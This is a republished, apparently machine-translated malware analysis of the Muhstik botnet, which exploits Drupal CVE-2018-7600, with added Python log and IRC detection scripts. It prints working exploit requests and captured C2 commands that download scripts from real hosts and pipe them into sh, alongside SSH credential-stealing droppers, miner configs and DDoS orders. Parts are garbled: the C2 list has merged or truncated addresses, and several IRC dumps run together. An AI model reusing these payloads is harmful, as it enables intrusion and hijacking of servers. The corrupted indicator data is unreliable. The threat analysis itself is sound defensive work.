
How the Muhstik botnet exploits the Drupal vulnerability CVE-2018-7600 for worm propagation

2025-01-19 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 05/31 Report

This article explains how the Muhstik botnet exploits the Drupal vulnerability CVE-2018-7600 to spread as a worm, a topic many readers may not be familiar with. The editor has summarized the original analysis below.

On March 28, 2018, Drupal.org announced a fix for vulnerability CVE-2018-7600. Drupal is an open-source content management system written in PHP, and many websites use it to serve web content. The vulnerability exists in multiple Drupal versions and can be exploited by an attacker to take full control of the website. Since April 13, 2018, 360 Cyber Security Research Institute has observed a large number of scans for this vulnerability on the Internet. Through analysis, we believe that at least three groups of malware are exploiting the vulnerability to spread. One group shows worm propagation behaviour, and its infection volume is significantly higher than that of the others. After analysis, we believe it is a long-standing botnet family. We named it muhstik, mainly because that string appears in many places in its binary file names and communication protocol. We believe muhstik has the following characteristics that deserve the community's attention:

Worm propagation

Long-term existence

Use of a large number of vulnerabilities

Mixed use of several profit-making methods

Attack payloads

In chronological order, Muhstik uses the following two sets of attack payloads. They account for about 80% of all payloads seen and are the main part of the attacks we observe:

#1 active time: 2018-04-14 03:33:36 ~ 2018-04-17 15:40:58

#2 active time: 2018-04-16 19:38:39 ~ present

The IP addresses of the corresponding attack sources are very scattered, and almost all of them run Drupal. The attack sources are themselves easy infection targets for the attack payload, which is an important indicator of worm spread and what aroused our vigilance. The details of the two sets of attack payloads are as follows:

Attack payload #1:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64 X64)
Host: {target}
Content-Type: application/x-www-form-urlencoded
Content-length: 2048

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=echo "team6 representing 73de29021fd0d8d2cfd204d2d955a46d" | tee t6nv

Attack payload #2:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64 X64)
Host: {target}
Content-Type: application/x-www-form-urlencoded
Content-length: 170

form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php

Sample aiox86 generated the above attack payload #2

The key samples are as follows:

da17dc1438bb039968a5737c6fbc88cd aiox86

We believe that the sample aiox86 above and its associated samples generate the attack payloads described earlier:

Attack payload #2 exists verbatim in this sample.

Attack payload #1 is very similar to #2, and we think it is generated by samples related to this one.
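Both HTTP requests shown above target the Drupal user-registration AJAX form with element_parents=account/mail/#value and inject a callable through the mail[#post_render][] key, which no legitimate client ever submits. As an added example (not code from the original report), the following Python scans web-server access logs in the common "combined" format for that request pattern and inspects a captured POST body for the injected callable; the log lines and the body are constructed, with TEST-NET client addresses.

```python
"""Detect Drupalgeddon2 (CVE-2018-7600) exploitation attempts in web-server logs.

Added example, not code from the original report. It assumes Apache/nginx
"combined" access-log lines; the sample log and request body are constructed.
"""
import re
from urllib.parse import parse_qs, unquote

# Combined log format: ip ident user [ts] "METHOD PATH PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The exploit request points element_parents at the "#value" of the mail field
# of the registration form; the query string is visible in ordinary access logs.
EXPLOIT_QUERY_RE = re.compile(r"element_parents=account/mail/#value", re.I)
# The body key through which the payload names a PHP callable (exec in the report).
RENDER_KEY = "mail[#post_render][]"


def parse_line(line: str):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def is_drupalgeddon2_request(method: str, path: str) -> bool:
    """True when the request line matches the exploit's URL pattern.

    The query string is percent-decoded first so %23value and %2F variants match too.
    """
    if method.upper() != "POST":
        return False
    route, _, query = path.partition("?")
    if not route.startswith("/user/register"):
        return False
    return bool(EXPLOIT_QUERY_RE.search(unquote(query)))


def render_callback(body: str):
    """Return the callable injected via mail[#post_render][] in a POST body, or None.

    parse_qs decodes the percent-encoded key itself, so both the plain and the
    fully encoded form of the payload are recognised.
    """
    values = parse_qs(body, keep_blank_values=True).get(RENDER_KEY)
    return values[0] if values else None


def scan_log(text: str):
    """Return (ip, timestamp, user-agent) for every line that looks like an attempt."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_drupalgeddon2_request(rec["method"], rec["path"]):
            hits.append((rec["ip"], rec["ts"], rec["ua"]))
    return hits


# Constructed sample data: two exploit attempts (one with an encoded slash) and one normal GET.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Apr/2018:03:33:36 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 4523 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.7 - - [14/Apr/2018:03:34:10 +0000] "GET /user/register HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Apr/2018:03:35:01 +0000] "POST /user/register?element_parents=account%2Fmail%2F%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 4523 "-" "curl/7.58.0"
"""
# Constructed body in the shape of the report's payload #2, with a harmless markup value.
SAMPLE_BODY = ("form_id=user_register_form&_drupal_ajax=1"
               "&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=id")

if __name__ == "__main__":
    for ip, ts, ua in scan_log(SAMPLE_LOG):
        print(f"Drupalgeddon2 attempt from {ip} at {ts} ({ua})")
    print("injected callable:", render_callback(SAMPLE_BODY))
```

Matching on the query string alone is deliberate: access logs rarely record POST bodies, and the element_parents value is enough to flag the attempt. When a WAF or reverse proxy does log bodies, render_callback tells you which PHP function the attacker tried to reach.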

In fact, the scanning behaviour of this sample is already quite complex, going well beyond the Drupal vulnerability scanning mentioned above:

Scan target IP addresses: the target IP addresses are fetched from the remote server 191.238.234.227, which gives the attacker more flexible control over the targets.

Delivered vulnerability payloads: not limited to Drupal; six other vulnerability payloads are included.

Scanned target ports: not only TCP 80 but also TCP 8080, 7001 and 2004; several different payloads are tried on each port.

Scan result reporting: after a payload is implanted successfully, the bot contacts the remote server 51.254.219.134 to report, and each payload accesses a different URL. In this way the attacker can easily identify which weakness each victim has.

Fetching the scan target IP addresses:

hxxp://191.238.234.227/amazon.php # we tried fetching from this URL and received 50 network segments, all belonging to Amazon
hxxp://191.238.234.227/dedi.php # we tried fetching from this URL and received 50 network segments, belonging to relatively scattered companies

Vulnerability payloads delivered:

ClipBucket: rss.php
DasanNetwork Solution: /cgi-bin/index.cgi
Drupal: CVE-2018-7600
WebDav
Weblogic: CVE-2017-10271
Webuzo: install.php
Wordpress: install.php

Correspondence between scanned target port and payload:

80: Weblogic, Wordpress, Drupal, WebDav, ClipBucket
2004: Webuzo
7001: Weblogic
8080: Wordpress, WebDav, DasanNetwork Solution

Payload reporting interfaces:

hxxp://51.254.219.134/clipbucket.php # ClipBucket
hxxp://51.254.219.134/dasan.php # DasanNetwork_Solution
hxxp://51.254.219.134/dav.php # WebDav
hxxp://51.254.219.134/drupal.php # Drupal
hxxp://51.254.219.134/oracleaudit.php?port= # Weblogic
hxxp://51.254.219.134/tomato.php # http401, used to detect an intermediate state
hxxp://51.254.219.134/webuzo.php # Webuzo
hxxp://51.254.219.134/wp.php # Wordpress

Sample aiox86 is distributed by the Muhstik botnet

At 360 Network Security Research Institute we continuously monitor the attack instructions of many botnets. This time we found that the control server 139.99.101.96:9090 distributed the sample aiox86 around 04:04 on 2018-04-19 with the following instructions:

The above C2 belongs to the Muhstik botnet family.

Muhstik botnet family

Muhstik is a variant of the Tsunami botnet. Its characteristics include:

Representative sample: c37016e34304ff4a2a0db1894cdcdb92

C2 servers: 11 domain names / IP addresses in total, all using port 9090. We guess this is for load balancing.

Communication protocol: based on the IRC protocol; different instructions are sent through different channels.

IRC channels: we have observed multiple IRC channels, all beginning with muhstik. At present we cannot fully confirm which channels are enabled on each C2 server; this is a consequence of how the IRC protocol works. Only when we receive instructions in a channel can we confirm that the attacker has activated that channel on the server.

The structure of the Muhstik botnet is already quite complex. As mentioned earlier, 11 C2 domain names / IP addresses are hard-coded in the sample, and it spreads and makes profit in several ways. Muhstik's scanning modules:

aioscan scanning module: as described above, this module carries six scanning payloads on four ports.

SSH scanning module: weak-password scanning

How Muhstik makes a profit:

xmrig mining: mines the XMR digital token; the pool address is 147.135.208.145:4871, a self-built mining pool.

cgminer mining: mines the BTC digital token using multiple mining pools, with the user name reb0rn.D3.

DDoS attacks: we intercepted a number of attack instructions against 46.243.189.102 between 07:20 and 07:40 on 2018-04-19. (We did not see this attack on our DDoSMon.net, but we had seen multiple earlier attacks against that IP address.)

Muhstik cgminer wallet and mining pool addresses:

{"url": "stratum+tcp://dash.viabtc.com:443", "user": "reb0rn.D3", "pass": "x"},
{"url": "stratum+tcp://dash.viabtc.com:443", "user": "reb0rn.D3", "pass": "x"},
{"url": "stratum+tcp://dash.viabtc.com:443", "user": "reb0rn.D3", "pass": "x"}

Muhstik C2 list, in the order in which it is hard-coded in the sample:

139.99.101.96 AS16276 OVH SAS
144.217.84.99 AS16276 OVH SAS
145.239.84.0 AS16276 OVH SAS
147.135.210.184 AS16276 OVH SAS
142.43.168 AS16276 OVH SAS
192.99.71.250 AS16276 OVH SAS
9090 AS16276 OVH SAS
142.44.240.149090 AS16276 OVH SAS
121.128.171.449090 AS4766 Korea Telecom # not currently active
:9090 AS16276 OVH SAS # not currently active
145.239.93.125 9090 AS16276 OVH SAS
irc.de-zahlung.eu:9090 # not currently active
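The C2 servers (all on TCP 9090), the self-built XMR pool on 147.135.208.145:4871, the cgminer pools on viabtc.com and the payload-serving hosts listed above are the network indicators a defender would hunt for. As an added example (not code from the 360 report), the following Python matches flow and DNS logs against those indicators and groups the results per internal host; only the C2 entries whose address survived intact in the list above are included, and the log lines are constructed with 192.0.2.x as the monitored hosts.

```python
"""Match flow and DNS logs against the Muhstik C2 and mining-pool indicators.

Added example, not code from the 360 report. Indicator values are copied from
the report; the flow and DNS log lines below are constructed (TEST-NET hosts).
"""
from collections import defaultdict

# C2 entries from the report whose address was printed intact (port 9090 throughout).
C2_SOCKETS = {
    ("139.99.101.96", 9090), ("144.217.84.99", 9090), ("145.239.84.0", 9090),
    ("147.135.210.184", 9090), ("192.99.71.250", 9090), ("145.239.93.125", 9090),
}
MINING_SOCKETS = {("147.135.208.145", 4871)}  # self-built XMR pool used by xmrig
# Hosts that serve stagers, scanning modules, cgminer configs or scan target lists.
PAYLOAD_HOSTS = {"51.254.219.134", "51.254.221.129", "191.238.234.227",
                 "104.236.26.43", "121.127.216.91"}
C2_DOMAINS = {"irc.de-zahlung.eu"}
MINING_DOMAINS = {"dash.viabtc.com", "bch.viabtc.com"}  # cgminer pool configs


def classify_flow(dst: str, dport: int):
    """Label one outbound connection, or None when it matches no indicator."""
    if (dst, dport) in C2_SOCKETS:
        return "c2"
    if (dst, dport) in MINING_SOCKETS:
        return "mining"
    if dst in PAYLOAD_HOSTS:
        return "payload-download"
    return None


def classify_dns(qname: str):
    """Label one DNS query name, or None when it matches no indicator."""
    q = qname.rstrip(".").lower()
    if q in C2_DOMAINS:
        return "c2"
    if q in MINING_DOMAINS:
        return "mining"
    return None


def scan_flows(text: str):
    """Flow lines: '<ts> <src> <dst> <dport> <proto>' (constructed format)."""
    hits = []
    for line in text.splitlines():
        ts, src, dst, dport, _proto = line.split()
        label = classify_flow(dst, int(dport))
        if label:
            hits.append((ts, src, f"{dst}:{dport}", label))
    return hits


def scan_dns(text: str):
    """DNS lines: '<ts> <client> <qname>' (constructed format)."""
    hits = []
    for line in text.splitlines():
        ts, client, qname = line.split()
        label = classify_dns(qname)
        if label:
            hits.append((ts, client, qname, label))
    return hits


def infected_hosts(flow_text: str, dns_text: str):
    """Map each internal host to the set of indicator categories it touched."""
    seen = defaultdict(set)
    for _ts, host, _indicator, label in scan_flows(flow_text) + scan_dns(dns_text):
        seen[host].add(label)
    return dict(seen)


# Constructed sample logs: one host shows the full chain (C2, payload fetch, mining),
# one only talks to a C2, one only resolves a pool name, one is clean.
SAMPLE_FLOWS = """\
2018-04-19T04:04:10Z 192.0.2.10 139.99.101.96 9090 tcp
2018-04-19T04:04:12Z 192.0.2.10 191.238.234.227 80 tcp
2018-04-19T04:05:00Z 192.0.2.10 147.135.208.145 4871 tcp
2018-04-19T04:05:30Z 192.0.2.11 198.51.100.50 443 tcp
2018-04-19T04:06:00Z 192.0.2.12 145.239.93.125 9090 tcp
"""
SAMPLE_DNS = """\
2018-04-19T04:03:59Z 192.0.2.10 irc.de-zahlung.eu
2018-04-19T04:07:00Z 192.0.2.13 dash.viabtc.com
2018-04-19T04:07:05Z 192.0.2.11 example.com
"""

if __name__ == "__main__":
    for host, labels in sorted(infected_hosts(SAMPLE_FLOWS, SAMPLE_DNS).items()):
        print(host, sorted(labels))
```

A host that only appears under "mining" may be running a different miner with the same pool, so the C2 socket matches are the strongest signal; a host showing the full chain is the one to isolate first.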

IRC channels, in alphabetical order:

#muhstik
#muhstik-i586
#muhstik-SSH
#muhstik-x86

While monitoring these IRC channels we received a number of instructions, some of which are listed below and shown in the following screenshots:

#muhstik-x86: implant the xmrig64 mining program
#muhstik-x86: implant the Muhstik.aioscan scanning module
#muhstik-x86: detect whether Drupal is present on the bot
#muhstik: implant the Muhstik.aioscan scanning module
#muhstik: issue DDoS attack instructions
#muhstik-SSH: configuration file for the cgminer mining program
#muhstik-SSH: perform SSH scanning
#muhstik-SSH: steal locally saved SSH credentials, scale out further, and deliver itself to achieve worm propagation
#muhstik-i586: implant Muhstik.aioscan
#muhstik-i586: implant the xmrig32 mining program
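The instructions above all arrive as IRC PRIVMSG lines whose text begins with a bot selector and a verb: SH runs a shell command, SSH starts SSH scanning, STD floods a target. Turning a captured channel log into structured records is the first step of triage: which channel issued what, which hosts served payloads, which targets were attacked. As an added example (not code from the 360 report), the following Python parser does that; the line shape follows the captured instructions, the "STD <ip> <seconds>" argument order is an assumption, and the sample capture is constructed with TEST-NET addresses and a placeholder host instead of the report's indicators.

```python
"""Parse captured IRC PRIVMSG traffic into structured Muhstik-style C2 commands.

Added example, not code from the 360 report. Assumptions: messages look like
":nick!user@host PRIVMSG #channel :!<selector> <VERB> <args>", and STD args
start with "<target_ip> <seconds>". The sample capture is constructed.
"""
import re
from collections import Counter
from dataclasses import dataclass

PRIVMSG_RE = re.compile(
    r"^:(?P<nick>[^!\s]+)(?:!(?P<userhost>\S+))? PRIVMSG (?P<channel>#\S+) :(?P<text>.*)$"
)
# Verbs as seen in the report: SH = shell command, SSH = SSH scan, STD = flood.
COMMAND_RE = re.compile(r"^!(?P<selector>\S*)\s+(?P<verb>SH|SSH|STD)\s+(?P<args>.*)$")
URL_RE = re.compile(r'https?://[^\s|;)>&"]+')


@dataclass
class C2Command:
    nick: str
    channel: str
    selector: str  # which bots should act: "*" = all, "x*" = the x86 build, and so on
    verb: str
    args: str

    @property
    def kind(self) -> str:
        return {"SH": "shell", "SSH": "ssh-scan", "STD": "ddos"}[self.verb]


def parse_privmsg(line: str):
    """Return a C2Command for a channel message carrying a bot command, else None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None
    c = COMMAND_RE.match(m["text"])
    if not c:
        return None
    return C2Command(m["nick"], m["channel"], c["selector"], c["verb"], c["args"].strip())


def parse_capture(text: str):
    """Parse a whole capture, skipping PING and other non-command lines."""
    return [cmd for cmd in map(parse_privmsg, text.splitlines()) if cmd]


def download_urls(cmd: C2Command):
    """URLs fetched by a SH command: the stager/payload hosts worth blocking and hunting."""
    return URL_RE.findall(cmd.args) if cmd.verb == "SH" else []


def ddos_target(cmd: C2Command):
    """(target_ip, seconds) for a STD command under the assumed argument order."""
    if cmd.verb != "STD":
        return None
    parts = cmd.args.split()
    secs = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    return parts[0], secs


def summarize(cmds):
    """Count commands per (channel, kind); this mirrors the per-channel roles in the report."""
    return Counter((c.channel, c.kind) for c in cmds)


# Constructed capture: a stager fetch, a scanner deployment, a flood order, an SSH scan, and noise.
SAMPLE_CAPTURE = """\
:botmaster!bm@localhost PRIVMSG #muhstik-x86 :!* SH curl http://dropper.example/muhstik.sh | sh > /dev/null 2>&1 &
:botmaster!bm@localhost PRIVMSG #muhstik-x86 :!x* SH (wget -c http://dropper.example/x/aiox86 -O /tmp/aiox86; chmod +x /tmp/aiox86) > /dev/null 2>&1
:botmaster!bm@localhost PRIVMSG #muhstik :!* STD 192.0.2.10 30
:botmaster!bm@localhost PRIVMSG #muhstik-ssh :!* SSH 10 100 25 192.0.2.20 192.0.2.21
:irc.example PING :keepalive
"""

if __name__ == "__main__":
    commands = parse_capture(SAMPLE_CAPTURE)
    for cmd in commands:
        print(cmd.channel, cmd.kind, cmd.selector, download_urls(cmd) or ddos_target(cmd) or cmd.args)
    print(summarize(commands))
```

In a real sinkhole or honeypot capture the sender prefix and channel names identify which C2 and which architecture-specific channel a command came from, and the extracted URLs feed straight into the malware URL indicator list.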

#muhstik-x86: implant the xmrig64 mining program

PRIVMSG #muhstik-x86 :!* SH curl http://104.236.26.43/muhstik.sh | sh > /dev/null 2>&1 &
PRIVMSG #muhstik-x86 :!* SH wget -qO- http://104.236.26.43/muhstik.sh | sh > /dev/null 2>&1 &

#muhstik-x86: implant the Muhstik.aioscan scanning module

PRIVMSG #muhstik-x86 :!x* SH (wget -c http://191.238.234.227/x/aiox86 -O /tmp/aiox86; chmod +x /tmp/aiox86) > /dev/null 2>&1
PRIVMSG #muhstik-x86 :!x* SH /tmp/aiox86 amazon > /dev/null 2>&1 &
PRIVMSG #muhstik-x86 :!x* SH /tmp/aiox86 dedi > /dev/null 2>&1 &

#muhstik-x86: detect whether Drupal is present on the bot

PRIVMSG #muhstik-x86 :!* SH (wc -l autoload.php && echo $(hostname -I | cut -d " " -f 1)) || echo "No drupal"
PRIVMSG #muhstik-x86 :!* SH (wc -l autoload.php | grep 17 && echo $(hostname -I | cut -d " " -f 1)) || echo "No drupal"

#muhstik: implant the Muhstik.aioscan scanning module

: timersclones localhost PRIVMSG # muhstik:! a * SH / tmp/aioarm amazon > / dev/null 2 > & 1 &: timersclones localhost PRIVMSG # muhstik:! a * SH / tmp/aioarm dedi > / dev/null 2 > & 1 &: timers cliches localhost PRIVMSG # muhstik:! a * SH (wget-c localhost-O / tmp/aioarm) Chmod + x / tmp/aioarm) > / dev/null 2 > & 1 &: SH / tmp/aiomipsel amazon > / dev/null 2 > muhstik:! Mps | * SH / tmp/aiomipsel amazon > / localhost PRIVMSG # muhstik:! Mps | * SH / tmp/aiomipsel dedi > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! Mps | * SH (wget-c localhost-O / tmp/aiomipsel Chmod + x / tmp/aiomipsel) > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! M | * SH / tmp/aiomips amazon > / dev/null 2 > & 1 &: timersclicklocalhost PRIVMSG # muhstik:! M | * SH / tmp/aiomips dedi > / dev/null 2 > & 1 &: timersclicklocalhost PRIVMSG # muhstik:! M | * SH (wget-c localhost-O / tmp/aiomips) Chmod + x / tmp/aiomips) > / dev/null 2 > & 1 &: timesclicklocalhost PRIVMSG # muhstik:! PPC | * SH / tmp/aioppc amazon > / dev/null 2 > & 1 &: timersclones localhost PRIVMSG # muhstik:! PPC | * SH / tmp/aioppc dedi > / dev/null 2 > & 1 &: timesclad localhost PRIVMSG # muhstik:! PPC | * SH (wget-c localhost-O / tmp/aioppc; chmod + x / tmp/aioppc) > / dev/null 2 > & 1 &

#muhstik: issue DDoS attack instructions

: * STD 46.243.189.102! * STD 46.243.189.102 60 XXXXXXX STD TIMERSclad localhost PRIVMSG # muhstik:! * | * 0 | * STD 46.243.189.127 30 XXXXVlTIMERSclad localhost PRIVMSG # muhstik:! * | * 1 | * STD 46.243.189.102 30 xxxxmm TIMERSclad localhost PRIVMSG # muhstik:! * | * 2 | * STD 46.243.189.102 30 XXXXVERSclad localhost PRIVMSG # muhstik: ! * | * 3 | * STD 46.243.189.102 127 30 XXXXV Timersclad localhost PRIVMSG # muhstik:! * | * 4 | * STD 46.243.189.102 127 30 XXXXV TIMERSclad localhost PRIVMSG # muhstik:! * | * 5 | * STD 46.243.189.102 127 30 XXXXXX TIMERSclad localhost PRIVMSG # muhstik:! * | * 6 | * STD 46.243.189.102 30 XXXXXX timesclad localhost PRIVMSG # muhstik:! * | | | * 7 | * STD 46.243.189.102 127 30 xxxxxxxv STD 46.243.189.102 30 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxmxxxxxxxxxxxxxxxxxxx | * STD 46.243.189.102 PRIVMSG # muhstik:! * | * 9 | * STD 46.243.189.102 30 XXXX |

#muhstik-SSH: configuration file for the cgminer mining program

PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep D3 && (wget -qO- http://51.254.221.129/cgminer.x11.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart) > /dev/null 2>&1 &
PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep L3 && (wget -qO- http://51.254.221.129/cgminer.scrypt.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart) > /dev/null 2>&1 &
PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S4 && (cgminer-api "addpool|stratum+tcp://bch.viabtc.com:443,Reborn.api,x" && cgminer-api "switchpool|3") > /dev/null 2>&1 &
PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S5 && (cgminer-api "addpool|stratum+tcp://bch.viabtc.com:443,reborn.api,x" && cgminer-api "switchpool|3") > /dev/null 2>&1 &
PRIVMSG #muhstik-ssh :!* SH tail -n1 /usr/bin/compile_time | grep S7 && (wget -qO- http://51.254.221.129/cgminer.sha256.conf > /config/cgminer.conf && /etc/init.d/cgminer.sh restart) > /dev/null 2>&1 &

#muhstik-SSH: steal locally saved SSH credentials, scale out further, deliver itself, and achieve worm propagation

PRIVMSG #muhstik-ssh :!* SH wget -qO- http://121.127.216.91/multiply/wp-content/plugins/all-in-one-wp-migration/t6ssh | sh > /dev/null 2>&1 &

#muhstik-SSH: perform SSH scanning

:! * SSH 10025 54.39.23.28 51.254.219.137 SSH 1010100 25 54.39.23.28 51.2519.137 muhstik-ssh:! * SSH 1010100 25 54.39.23.28 51.254.219.137muhstik-ssh:! * SSH 10210054.39.23.28 51.254.219.137 SSH 101010025 54.39.23.28 51.254.219.137 SSH 103100 25 54.39.28 51.254.219.137 28 51.254.219.137 SSH 1010 25 54.39.23.28 51.254.219.137 SSH 10410 25 54.39.23 28 51.254.219.137 SSH 106100 25 54.39.28 muhstik-ssh:! * SSH 107100 25 54.39.28 localhost PRIVMSG # muhstik-ssh:! * SSH 107100 25 54.39.23.28 51.254.219.137RM Timersclad localhost PRIVMSG # muhstik-ssh:! * SSH ! * SSH 110100 25 54.39.23.28 51.254.219.137 SSH 100 25 54.39.28 51.254.219.137 SSH 110100 25 54.39.28 51.254.219.137 muhstik-ssh:! * SSH 111100 25 54.39.28 51.254.219.137TIMERSclad localhost PRIVMSG # muhstik-ssh:! * SSH 112100 25 54.39.28 51.254.219.137 Muhstik-ssh:! * SSH 113100 25 54.39.23.28 51.254.219.137 SSH 114100 25 54.39.23.28 51.254.219.137 SSH 114100 25 54.39.23.28 51.254.219.137 SSH 118100 25 54.39.28 51.254.219.137 SSH 114100 25 54.39.28 51.254.219.137 SSH 114100 25 54.39.28 51.254.219.137

#muhstik-i586: implant Muhstik.aioscan

PRIVMSG #muhstik-i586 :!i* SH (wget -c http://191.238.234.227/x/aioi586 -O /tmp/aioi586; chmod +x /tmp/aioi586) > /dev/null 2>&1 &
PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 amazon > /dev/null 2>&1 &
PRIVMSG #muhstik-i586 :!i* SH /tmp/aioi586 dedi > /dev/null 2>&1 &

#muhstik-i586: implant the xmrig32 mining program

PRIVMSG #muhstik-i586 :!* SH wget -qO- http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &
PRIVMSG #muhstik-i586 :!* SH curl http://104.236.26.43/xmrt32.sh | sh > /dev/null 2>&1 &

Muhstik has probably existed for a long time

By tracing the history of Muhstik-related domain names, we find that Muhstik has a long history and is strongly connected to the following domain names:

dasan.deutschland-zahlung.eu
134.ip-51-254-219.eu
uranus.kei.su
wireless.kei.su
www.kei.su
y.fd6fq54s6df541q23sdxfg.eu

IoC

Muhstik C2 list

139.99.101.96 AS16276 OVH SAS
144.217.84.99 AS16276 OVH SAS
145.239.84.0 AS16276 OVH SAS
147.135.210.184 AS16276 OVH SAS
142.43.168 AS16276 OVH SAS
192.99.71.250 AS16276 OVH SAS
9090 AS16276 OVH SAS
142.44.240.149090 AS16276 OVH SAS
121.128.171.449090 AS4766 Korea Telecom # not currently active
:9090 AS16276 OVH SAS # not currently active
145.239.93.125 9090 AS16276 OVH SAS
irc.de-zahlung.eu:9090 # not currently active

Muhstik malware URLs

hxxp://51.254.221.129/c/cron
hxxp://51.254.221.129/c/tfti
hxxp://51.254.221.129/c/pftp
hxxp://51.254.221.129/c/ntpd
hxxp://51.254.221.129/c/sshd
hxxp://51.254.221.129/c/bash
hxxp://51.254.221.129/c/pty
hxxp://51.254.221.129/c/shy
hxxp://51.254.221.129/c/nsshtfti
hxxp://51.254.221.129/c/nsshcron
hxxp://51.254.221.129/c/nsshpftp
hxxp://51.254.221.129/c/fbsd
hxxp://191.238.234.227/x/aiox86

Muhstik malware MD5

c37016e34304ff4a2a0db1894cdcdb92 # Muhstik sample module
da17dc1438bb039968a5737c6fbc88cd # Muhstik scanning module

That concludes the analysis of how the Muhstik botnet exploits the Drupal vulnerability CVE-2018-7600 for worm propagation.
